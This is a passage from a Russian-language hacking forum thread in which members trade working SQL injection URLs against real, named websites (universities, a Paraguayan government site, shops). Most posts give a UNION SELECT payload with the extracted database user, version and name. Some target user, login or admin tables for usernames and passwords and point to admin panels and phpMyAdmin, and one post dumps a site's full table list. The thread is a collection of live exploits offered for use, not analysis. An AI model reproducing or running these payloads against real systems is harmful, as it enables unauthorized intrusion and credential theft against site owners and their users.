ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11611  
Старый 22.03.2010, 19:20
Аватар для root_sashok
root_sashok
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635

Репутация: 1593


Отправить сообщение для root_sashok с помощью ICQ
По умолчанию

Здесь вывод в заголовке:
Код:
http://map64.ru/index.php?id=-1+union+select+user()--
Есть таблица users, она последняя:
Код:
http://map64.ru/index.php?id=-1+union+select+table_name+from+information_schema.tables+limit+23,1--
Админка:
Код:
http://www.map64.ru/job

Последний раз редактировалось root_sashok; 22.03.2010 в 19:57..
 
Ответить с цитированием

  #11612  
Старый 22.03.2010, 19:31
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

dudu,edu

Цитата:
http://dotank.nyls.edu/projects/DDT/sys_index.pl?pid=0&iid=7&alt_id=45'+union+select+1 ,2,3,email,password,6+from+users/*&action=view_alternate
version:4
----------------------------------
Цитата:
http://muscle.hps.gatech.edu/protocol.pl?pid=14+union+select+version()+from+use r+limit+1,1--+&op=Show
вывод в тайтле

Последний раз редактировалось $n@ke; 22.03.2010 в 19:43..
 
Ответить с цитированием

  #11613  
Старый 22.03.2010, 20:18
Аватар для kori256
kori256
Познающий
Регистрация: 07.02.2009
Сообщений: 89
Провел на форуме:
3029180

Репутация: 106
Отправить сообщение для kori256 с помощью ICQ
По умолчанию

Цитата:
http://www.dynamicinst.net/news.php?id=21+union+select+1,2,3,4,concat(user,0x 3a,password)+from+login/*
и оно же
Цитата:
http://www.dynamicinst.net/news.php?id=21+union+select+1,2,3,4,concat_ws(0x3a ,user(),database(),version())/*
User: dynamicdb@localhost
Version: 5.0.27
Dbname: dynamic

Последний раз редактировалось kori256; 22.03.2010 в 21:21..
 
Ответить с цитированием

  #11614  
Старый 22.03.2010, 21:42
Аватар для root_sashok
root_sashok
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635

Репутация: 1593


Отправить сообщение для root_sashok с помощью ICQ
По умолчанию

Код:
http://www.conacyt.gov.py/admin/mostrar.php?noti=imagen&id=-1+union+select+1,concat_ws(0x3a,user(),database(),version())--
Username: web@localhost
Database: web
Version: 5.0.26

Код:
http://www.wyoptv.org/programming/viewprogram.php?id=1+union+select+1,user(),3,4,5,6,7,8,9,10,11,version(),database()/*
Username: wyoptv@localhost
Database: wyoptv
Version: 5.0.32-Debian_7etch6-log

Код:
http://www.2how.com/board/index.php?group=-1+union+select+1,2,3,4,version%28%29,6,7,8,9,10,11,12,13--
Username: root@localhost
Database: howhow_board
Version: 5.0.67-log

Код:
http://www.china-efe.org/article/article_show.php?article_id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16--
Username: chinaedu@localhost
Database: chinaefe
Version: 5.1.11-beta-log

Последний раз редактировалось root_sashok; 22.03.2010 в 22:52..
 
Ответить с цитированием

  #11615  
Старый 22.03.2010, 22:57
Аватар для CyberHunter
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Код:
http://lf-j.com/regi.php?id=-19+union+select+1,2,version%28%29,4,5,6,7,8,9+--+
Version: 5.0.89-community-log
User: lfjcom_user@localhost
Database: lfjcom_db

Код:
http://www.pitatel.com/pclass.php?id=-19+union+select+1,2,3,4,5,concat%28user%28%29,database%28%29,version%28%29%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+
Version: 4.0.22-standard 5
User: root@localhost
Database: mysql 5

Последний раз редактировалось CyberHunter; 22.03.2010 в 23:06..
 
Ответить с цитированием

  #11616  
Старый 22.03.2010, 23:08
Аватар для KENTov
KENTov
Новичок
Регистрация: 16.12.2009
Сообщений: 7
Провел на форуме:
103370

Репутация: 16
По умолчанию

ШкОлОтЭ ищет sql инъекции

PHP код:
Targethttp://www.turmanidze.ge/en/main.php?id=1223989248 
Host IP: 212.72.131.186
Web Server: Apache/2.2.14 (FreeBSD) DAV/2
DB Server: MySQL >=5
Current User: turmanidze@localhost
Sql Version: 5.0.77
Current DB: turmanidze
System User: turmanidze@localhost
Host Name: webserver.sanet.ge
Installation dir: /usr/local/
DB User: 'turmanidze'@'localhost'
Data Bases: information_schema
test
turmanidze



http://www.turmanidze.ge/admin/
http://www.turmanidze.ge/phpmyadmin/

в userlist смотрите пасс и логин, правда у меня что-то не подходит
 
Ответить с цитированием

  #11617  
Старый 22.03.2010, 23:38
Аватар для root_sashok
root_sashok
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635

Репутация: 1593


Отправить сообщение для root_sashok с помощью ICQ
По умолчанию

Код:
http://profremont.com.ua/advices.php?article=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3--
Username: profremon_base@192.168.2.4
Database: profremon_base
Version: 5.0.51a-log

Код:
http://www.vanillamusic.gr/index.php?module=content&action=article&id=-1+union+select+user(),2--
Username: vmusic@localhost
Database: vanillamusic_gr
Version: 4.0.26

Вывод в заголовке.

Код:
http://www.savatouristik.ru/index.php?mid_open=7&id=-1+union+select+1,concat_ws(0x3a,user(),database(),version())--
Username: client304@localhost
Database: savatour
Version: 4.0.27

Код:
http://www.downhill911.com/actualite-vtt-express.php?n=824+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9--
Username: Root@localhost
Database: lmorillon
Version: 4.0.12-max-debug

Последний раз редактировалось root_sashok; 23.03.2010 в 01:16..
 
Ответить с цитированием

  #11618  
Старый 23.03.2010, 01:16
Аватар для Dr..VATSON
Dr..VATSON
Новичок
Регистрация: 07.12.2008
Сообщений: 12
Провел на форуме:
487591

Репутация: 43
По умолчанию

PR: 5

5.0.81-log

dbo234342530@74.208.16.153


Код:
http://www.downtowncrossing.org/shop/shop.php?id=-103+union+select+1,group_concat%28username%29,3,group_concat%28password%29+from+admin%20--
админкЭ

http://www.downtowncrossing.org/admin
 
Ответить с цитированием

  #11619  
Старый 23.03.2010, 08:02
Аватар для _eXorcist_
_eXorcist_
Участник форума
Регистрация: 24.12.2009
Сообщений: 130
Провел на форуме:
528073

Репутация: -3
Отправить сообщение для _eXorcist_ с помощью ICQ
По умолчанию

Host Information

Server = Apache
Version = 5.0.70-debug-log
Powered by = PHP/5.2.12-pl0-gentoo
Attack Type = SQL Union Injection
Current User = h_bolt_ru@localhost
Current Database = bolt_ru
Supports Union = yes
Union Columns = 17

Url| http://www.bolt.ru/cl2.php?metcod=1034

Vuln: http://www.bolt.ru/cl2.php?metcod=1034+and+1=0+ Union Select 1 ,2,3,4,5,6,7,8, UNHEX(HEX([visible])) ,10,11,12,13,14,15,16,17

Comment: --

Visible Column: 9

Hexed: True

Cookie:

Keyword:

Param:

Database:bolt_ru

information_schema
bolt_ru

Tables:
555 L
555 E
DIN 125 A
DIN 125 A2
DIN 1480
DIN 1481
DIN 1587 A2
DIN 2093
DIN 316
DIN 426 A
DIN 439 A2
DIN 444
DIN 471 (ГОСТ 13942-86)
DIN 471 (нормальный тип)
DIN 471 (тЯжелый тип)
DIN 472 (нормальный тип)
DIN 472 (тЯжелый тип)
DIN 472 ГОСТ 13943
DIN 530 A
DIN 538 A
DIN 555 A
DIN 555 C
DIN 556 A
DIN 562
DIN 564 A
DIN 567A
DIN 571
DIN 571A
DIN 580 A2
DIN 582
DIN 603
DIN 616A
DIN 622A
DIN 6331
DIN 6334
DIN 6797
DIN 6798
DIN 6799
DIN 6915
DIN 6916
DIN 6923
DIN 7500 M (ГОСТ 11650)
DIN 7976
DIN 7980 A2
DIN 7981 Z A2
DIN 7981
DIN 7982 Z A2
DIN 7982
DIN 7985 Z A2
DIN 7985
DIN 9021 A2
DIN 9021
DIN 912 A2
DIN 912
DIN 913
DIN 914 A2
DIN 914
DIN 915 A2
DIN 915
DIN 916 A2
DIN 916
DIN 931
DIN 933 A2
DIN 933
DIN 934 A2
DIN 934
DIN 937
DIN 94
DIN 95
DIN 963 A2
DIN 963
DIN 964
DIN 965 Z A2
DIN 965
DIN 966
DIN 967
DIN 975 A2
DIN 975
DIN 976
DIN 982
DIN 985 A2
DIN 985
ISO 7380
Pozi
Tesr Din 2
Test Din
anons
assortiment
catpage
grps
massy
met_sys_vars
news
phpbb_acl_groups
phpbb_acl_options
phpbb_acl_roles
phpbb_acl_roles_data
phpbb_acl_users
phpbb_attachments
phpbb_banlist
phpbb_bbcodes
phpbb_bookmarks
phpbb_bots
phpbb_config
phpbb_confirm
phpbb_disallow
phpbb_drafts
phpbb_extension_groups
phpbb_extensions
phpbb_forums
phpbb_forums_access
phpbb_forums_track
phpbb_forums_watch
phpbb_groups
phpbb_icons
phpbb_lang
phpbb_log
phpbb_moderator_cache
phpbb_modules
phpbb_poll_options
phpbb_poll_votes
phpbb_posts
phpbb_privmsgs
phpbb_privmsgs_folder
phpbb_privmsgs_rules
phpbb_privmsgs_to
phpbb_profile_fields
phpbb_profile_fields_data
phpbb_profile_fields_lang
phpbb_profile_lang
phpbb_ranks
phpbb_reports
phpbb_reports_reasons
phpbb_search_results
phpbb_search_wordlist
phpbb_search_wordmatch
phpbb_sessions
phpbb_sessions_keys
phpbb_sitelist
phpbb_smilies
phpbb_styles
phpbb_styles_imageset
phpbb_styles_imageset_data
phpbb_styles_template
phpbb_styles_template_data
phpbb_styles_theme
phpbb_topics
phpbb_topics_posted
phpbb_topics_track
phpbb_topics_watch
phpbb_user_group
phpbb_users
phpbb_warnings
phpbb_words
phpbb_zebra
pictbl
prt
prt2
prt3
tovkw
tovkw2
ВытЯжнаЯ в потай
ВытЯжнаЯ с буртиком
ГОСТ 10299-80
ГОСТ 10300-80
ГОСТ 10605-94
ГОСТ 11371-78 исп 1 кл А
ГОСТ 11371-78 исп 1 кл С
ГОСТ 11371-78 исп 2
ГОСТ 1144-80
ГОСТ 1145-80
ГОСТ 1146-80
ГОСТ 11530-76
ГОСТ 11532-76
ГОСТ 11674-75
ГОСТ 11738-84
ГОСТ 11860-85 исп 1
ГОСТ 11860-85 исп 2
ГОСТ 1491-80
ГОСТ 17473-80
ГОСТ 17474-80
ГОСТ 17475-80=DIN 7991
ГОСТ 22042-76 исп 1
ГОСТ 22353-77
ГОСТ 22354-77
ГОСТ 22355-77
ГОСТ 3032-76
ГОСТ 397-79
ГОСТ 4028-63
ГОСТ 4029-63
ГОСТ 4751-73 (DIN 580)
ГОСТ 5915-70
ГОСТ 5918-73 исп 1
ГОСТ 5918-73 исп 2
ГОСТ 5929-70
ГОСТ 6402-70 лег
ГОСТ 6402-70 норм
ГОСТ 6402-70 тжл
ГОСТ 6958-78 кл А
ГОСТ 6958-78 кл С
ГОСТ 7786-81
ГОСТ 7795-70
ГОСТ 7796-70
ГОСТ 7798-70
ГОСТ 7801-81
ГОСТ 7802-81
ГОСТ 7805-70
ГОСТ 7808-70
ГОСТ 799-73
ГОСТ 809-71
ГОСТ 8144-73
ГОСТ 9064-75
Конфирмат
Саморез по гипсокартону
Саморез
Шуруп потай, универсальный (пози)

Columns: Table
 
Ответить с цитированием

  #11620  
Старый 23.03.2010, 11:36
Аватар для kori256
kori256
Познающий
Регистрация: 07.02.2009
Сообщений: 89
Провел на форуме:
3029180

Репутация: 106
Отправить сообщение для kori256 с помощью ICQ
По умолчанию

Код:
http://www.globalideasbank.org/site/store/detail.php?articleId=43+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10,11,12,13,14,15,16,17,18,19+LIMIT+1,1--
Username: gib_db@localhost
Database: gib_db
Version: 5.0.89-community
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ